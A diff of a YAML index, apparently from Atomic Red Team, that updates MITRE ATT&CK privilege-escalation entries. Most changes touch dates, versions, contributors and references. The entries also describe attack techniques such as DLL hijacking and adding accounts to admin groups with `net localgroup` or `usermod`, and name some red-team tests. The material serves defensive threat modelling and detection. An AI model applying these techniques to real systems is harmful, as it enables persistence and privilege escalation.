       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests:
     - name: Modify Fax service to run PowerShell
@@ -30036,26 +30302,7 @@ privilege-escalation:
         elevation_required: true
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -30072,6 +30319,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -30082,9 +30330,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -30092,13 +30344,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -30128,6 +30396,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -30138,6 +30407,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -30146,13 +30416,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -30194,9 +30464,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -30264,7 +30531,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests:
     - name: Print Processors
@@ -30304,14 +30570,14 @@ privilege-escalation:
         elevation_required: true
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -30327,8 +30593,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -30342,7 +30608,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -30368,6 +30634,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -30395,7 +30665,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests:
     - name: DLL Search Order Hijacking - amsi.dll
@@ -30464,7 +30733,7 @@ privilege-escalation:
         elevation_required: true
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -30490,7 +30759,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -30532,7 +30801,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -30610,11 +30878,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -30694,7 +30961,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -30717,7 +31054,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -30765,8 +31102,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests:
     - name: Thread Execution Hijacking
@@ -30812,7 +31147,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -30867,8 +31202,6 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests:
     - name: Application Shim Installation
@@ -30957,7 +31290,7 @@ privilege-escalation:
         elevation_required: true
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -31018,9 +31351,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -31029,7 +31362,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests:
     - name: Add Port Monitor persistence in Registry
@@ -31106,7 +31438,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -31127,12 +31459,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -31235,7 +31566,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests:
     - name: Shellcode execution via VBA
@@ -31742,12 +32072,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -31760,7 +32089,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -31773,7 +32101,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -31803,7 +32130,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests:
     - name: Shortcut Modification
@@ -31881,7 +32209,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -31907,8 +32235,6 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests:
     - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -31952,7 +32278,7 @@ privilege-escalation:
         elevation_required: true
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -32029,12 +32355,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -32053,6 +32378,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -32060,7 +32386,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32080,29 +32405,31 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -32123,7 +32450,7 @@ privilege-escalation:
         name: powershell
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -32159,6 +32486,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -32170,16 +32501,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -32215,12 +32542,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -32228,9 +32555,8 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests:
     - name: LockBit Black - Modify Group policy settings -cmd
@@ -32286,7 +32612,7 @@ privilege-escalation:
         elevation_required: true
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -32301,6 +32627,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
